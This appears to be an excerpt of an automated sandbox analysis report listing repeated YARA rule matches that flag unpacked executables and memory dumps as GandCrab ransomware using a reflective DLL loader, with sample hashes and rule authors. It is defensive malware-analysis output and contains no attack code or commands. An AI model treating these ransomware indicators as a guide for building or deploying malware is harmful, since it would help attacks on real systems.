Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 2.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 32.3.ssapst.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 32.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 6.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000C.00000003.444009772.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000003.334936467.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
